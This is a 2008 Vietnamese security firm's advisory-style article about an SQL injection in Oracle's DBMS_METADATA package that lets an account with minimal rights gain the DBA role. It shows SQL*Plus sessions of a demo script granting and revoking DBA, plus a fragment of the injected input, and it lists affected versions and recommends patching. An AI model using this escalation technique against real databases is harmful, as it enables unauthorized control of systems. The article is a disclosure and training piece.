VietPace - Chuyên gia bảo mật Oracle hàng đầu tại Việt Nam. Chuyên đào tạo các khóa học Oracle

Trang chủ Khách hàng đăng nhập Đối tác đăng nhập Liên hệ

Tìm kiếm:

Đào tạo

Giải pháp

Kiến thức

Tin tức

Giới thiệu

Chèn mã SQL, PL/SQL đoạt quyền DBA với DBMS_METADATA

Giới thiệu

Trong lĩnh vực bảo mật thông tin, kỹ thuật chèn mã SQL khá phổ biến đối với những người quan tâm về bảo mật, và ở Việt Nam kỹ thuật này thường được ứng dụng cho những Cơ sở dữ liệu đơn giản, ít được sử dụng tại các doanh nghiệp lớn như SQL Server, MySQL. Vì lý do này, tính nguy hiểm của chèn mã SQL vẫn chưa được đánh giá đúng mức tại Việt Nam. Đối với Cơ sở dữ liệu Oracle (Oracle Database), kỹ thuật này được biến đổi khá đa dạng và nguy hiểm, cho phép một tài khoản với quyền hạn thấp có thể tùy biến nâng, đoạt được quyền quản trị DBA theo nhiều cách khác nhau, giúp tin tặc có thể điều khiển toàn hệ thống máy chủ Oracle. Bài viết này sẽ minh họa mã khai thác điểm yếu chèn mã SQL, PL/SQL đối với gói lệnh sẵn có DBMS_METADATA.

Gói lệnh sẵn có DBMS_METADATA của Oracle Database, mặc định cho phép bất kì tài khoản nào trong Oracle cũng có thể truy cập.

Mã minh họa

Để minh họa kỹ thuật chèn mã vào gói DBMS_METADATA, chúng ta sẽ dùng File mã lệnh dbms_meta_get_ddl_local.sql: File lệnh này cho phép một tài khoản bất kì chỉ có 2 quyền CREATE SESSION và CREATE PROCEDURE có thể nâng quyền thành DBA.
(Nhằm mục đích minh họa, File lệnh này áp dụng cho kết nối đến Oracle Database cụ thể)

Mặc định tài khoản SCOTT được gán 2 nhóm quyền CONNECT, RESOURCE, ứng với các quyền đơn lẻ sau:

F:\demo>sqlplus scott/tiger

SQL*Plus: Release 9.2.0.1.0 - Production on Mon Oct 20 18:35:25 2008

Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.

Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.1.0 - Production

SQL> SELECT * FROM user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO

2 rows selected

Thực hiện File mã lệnh sau để nâng quyền tài khoản SCOTT thành DBA:

SQL> @dbms_meta_get_ddl_local.sql

dbms_meta_get_ddl_local: Release 1.0 - Production on Mon Oct 20 18:41:56 2008
Copyright (c) 2008 WWW.VIETPACE.COM Limited. All rights reserved.

USERNAME TO CHECK [SCOTT]:
PRIVS CONTROL Grant/Revoke [G]:

ERROR: -31600
MSG: ORA-31600: invalid input value '||SCOTT.own||' for parameter OBJECT_TYPE in

function GET_DDL

PL/SQL procedure successfully completed.

For updates please visit WWW.VIETPACE.COM | WWW.BAOMATORACLE.COM

SQL>

Tài khoản SCOTT đã nâng quyền lên thành DBA:

SQL> SELECT * FROM user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT RESOURCE NO YES NO

3 rows selected.

Để gỡ quyền DBA khỏi tài khoản SCOTT, chúng ta làm như sau:

SQL> @dbms_meta_get_ddl_local.sql

dbms_meta_get_ddl_local: Release 1.0 - Production on Mon Oct 20 18:58:57 2008
Copyright (c) 2008 WWW.VIETPACE.COM Limited. All rights reserved.

USERNAME TO CHECK [SCOTT]:
PRIVS CONTROL Grant/Revoke [G]: R

--- REVOKING DBA FROM SCOTT...
--- DONE!

PL/SQL procedure successfully completed.

For updates please visit WWW.VIETPACE.COM | WWW.BAOMATORACLE.COM

SQL>

Tài khoản SCOTT chỉ còn 2 nhóm quyền như lúc đầu:

SQL> SELECT * FROM user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO

2 rows selected.

Phiên bản ảnh hưởng

VietPace đã kiểm thử kỹ thuật này trên các phiên bản Oracle Database sau:

Oracle Database 9.2.0.1, 9.2.0.4, 9.2.0.6, 9.2.0.8
Oracle Database 10.1.0.3

Giải pháp khắc phục

Để khắc phục lỗi này, người sử dụng cần cập nhật bản vá lỗi mới nhất cho hệ thống Oracle Database sớm nhất. Tuy nhiên việc cập nhật bản vá lỗi không đúng cách có thể khiến hệ thống Oracle Database không thể hoạt động được nữa.Vì vậy cần kiểm thử nhiều lần trước khi thực hiện vá lỗi, hoặc các bạn có thể liên lạc với chúng tôi tại đây.

Ngoài ra, để hiểu rõ hơn về kỹ thuật này, các bạn nên tham gia các khóa học sau tại VietPace.

1. Giải pháp chống tấn công Oracle

2. Kỹ thuật tấn công Oracle

(21/10/2008 - VietPace)

Tham khảo

dbms_meta_get_ddl.pl

VietPace chuyên cung cấp giải pháp và khóa đào tạo về công nghệ ORACLE và SUN, đặc biệt chúng tôi tiên phong về lĩnh vực bảo mật ORACLE tại Việt Nam, để biết thêm thông tin xin vui lòng liên hệ tại:

- Địa chỉ: 123 Trương Định, Quận 3, TP. HCM
- Điện thoại: +84 8 5.233.333
- Fax: +84 8 9.322.115
- email: contact@vietpace.com